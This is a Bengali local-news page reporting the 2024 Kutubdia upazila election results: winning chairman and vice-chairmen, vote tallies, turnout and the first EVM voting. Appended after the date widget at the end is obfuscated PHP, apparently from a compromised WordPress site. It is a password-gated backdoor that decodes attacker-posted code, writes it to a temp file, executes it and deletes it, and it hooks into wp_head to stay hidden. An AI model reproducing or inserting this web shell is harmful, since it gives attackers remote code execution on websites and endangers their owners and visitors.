• বুধবার, ১৯ জুন ২০২৪, ১১:৩১ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

কুতুবদিয়া উপজেলা নির্বাচন সম্পন্ন,বিজয়ী হলেন যারা

ইমরানুল হক আযাদ:
আপডেট : বৃহস্পতিবার, ৯ মে, ২০২৪

ইমরানুল হক আযাদ-কুতুবদিয়া থানা প্রতিনিধি:


প্রথম ধাপে ষষ্ঠ কুতুবদিয়া উপজেলা পরিষদের নির্বাচনে চেয়ারম্যান পদে ব্যারিস্টার মোহাম্মদ হানিফ বিন কাশেম, ভাইস চেয়ারম্যান (পুরুষ) পদে সাংবাদিক আকবর খাঁন ও ভাইস চেয়ারম্যান (মহিলা) পদে হাসিনা আক্তার বিউটি বিপুল ভোটে বিজয়ী হয়েছেন।

 

বুধবার (৮ মে) সন্ধ্যায় উপজেলা পরিষদের সম্মেলন কক্ষে স্থানীয় নির্বাচন কর্মকর্তা ও সহকারী রিটার্নিং কর্মকর্তা মো. নুরুল ইসলাম বেসরকারিভাবে এ ফলাফল ঘোষণা করেন।

 

ওই দিন সকাল ৮টা থেকে বিকাল ৪টা পর্যন্ত উপজেলার ৩৭টি কেন্দ্রের ২৫৮ বুথে ইলেকট্রিক ভোটিং মেশিনে (ইভিএমে) ভোটগ্রহণ অনুষ্ঠিত হয়।

 

বেসরকারিভাবে ঘোষিত নির্বাচনের ফলাফলে দেখা যায়, চেয়ারম্যান পদে ব্যারিস্টার মোহাম্মদ হানিফ বিন কাশেম (ঘোড়া) ২৭ হাজার ৩৯৪ ভোট পেয়ে বিজয়ী হয়েছেন। তার নিকটতম প্রতিদ্বন্দ্বী প্রার্থী আছহাব উদ্দিন কুতুবী (আনারস) পেয়েছেন ৫ হাজার ৫২২ ভোট এবং এডভোকেট ফরিদুল ইসলাম চৌধুরী (মোটরসাইকেল) পেয়েছেন ৩ হাজার ৭৪৬ ভোট।

 

ভাইস চেয়ারম্যান (পুরুষ) পদে সাংবাদিক আকবর খাঁন (উড়োজাহাজ) ১৯ হাজার ৯৭৮ ভোট পেয়ে বিজয়ী হয়েছেন। তার নিকটতম প্রতিদ্বন্দ্বী প্রার্থী জুনাইদুল হক (চশমা) ১৩ হাজার ২৫২ ভোট ও ফরিদ উদ্দিন তালুকদার (বই) প্রতীক নিয়ে ৩ হাজার ৪১৬ ভোট পেয়েছেন।

 

অন্যদিকে ভাইস চেয়ারম্যান (মহিলা) হাসিনা আক্তার বিউটি (কলসি) ২১ হাজার ৪৫৯ ভোট পেয়ে টানা দ্বিতীয়বারের মতো বিজয়ী হয়েছেন। তার নিকটতম প্রতিদ্বন্দ্বী প্রার্থী ছৈয়দা মেহেরুন্নেছা (ফুটবল) প্রতীক নিয়ে ১৫ হাজার ১০ ভোট পেয়েছেন।

কুতুবদিয়া উপজেলায় মোট ভোটার সংখ্যা ৯৭ হাজার ১৭০ জন ভোটার রয়েছে। তৎমধ্যে ৫১ হাজার ৫৬৯ জন পুরুষ ও ৪৫ হাজার ৬০১ জন নারী ভোটার রয়েছে।

স্থানীয় নির্বাচন অফিসের দেওয়া তথ্য অনুযায়ী প্রথম ধাপে অনুষ্ঠিত নির্বাচনে প্রদত্ত ভোটের সংখ্যা শতকরা ৩৭ দশমিক ৮৩।

এই প্রথম ইলেকট্রিক ভোটিং মেশিনে (ইভিএম) নিজ নিজ ভোটাধিকার প্রয়োগ করেছেন কুতুবদিয়াবাসী। ভোটের দিন সকাল থেকে ঝড় বৃষ্টি হলেও কেন্দ্রে ভোটারদের উপচে পড়া ভিড় ছিল। নানা উৎসাহ উদ্দীপনায় সুন্দর পরিবেশে ভোট উপহার দেয়ার জন্য প্রশাসনের প্রতি কৃতজ্ঞতা প্রকাশ করেন বিজয়ী প্রার্থী ও ভোটাররা।

উপজেলা নির্বাচন কর্মকর্তা ও সহকারী রিটার্নিং কর্মকর্তা মো. নুরুল ইসলাম জানান, সুষ্ঠু, অবাধ ও নিরপেক্ষভাবে ভোট গ্রহণ সম্পন্ন হয়েছে।

ইভিএমে ভোট উপলক্ষ্যে ভোটারদের উপস্থিতি ছিল ব্যাপক। ভোট চলাকালীন সময় কোনো কেন্দ্রে অপ্রীতিকর ঘটনা ঘটেনি। ভোটগ্রহণ শেষে বেসরকারিভাবে ফলাফল ঘোষণা করা হয়েছে।

উল্লেখ্য, এবারের উপজেলা পরিষদ নির্বাচনে প্রত্যন্ত এ অঞ্চলে চেয়ারম্যান পদে ৩ জন, ভাইস চেয়ারম্যান (পুরুষ) পদে ৩ জন ও ভাইস চেয়ারম্যান (মহিলা) পদে ২ জনসহ মোট ৮ জন প্রার্থী প্রতিদ্বন্দ্বিতা করেছেন।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১১:৩১)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}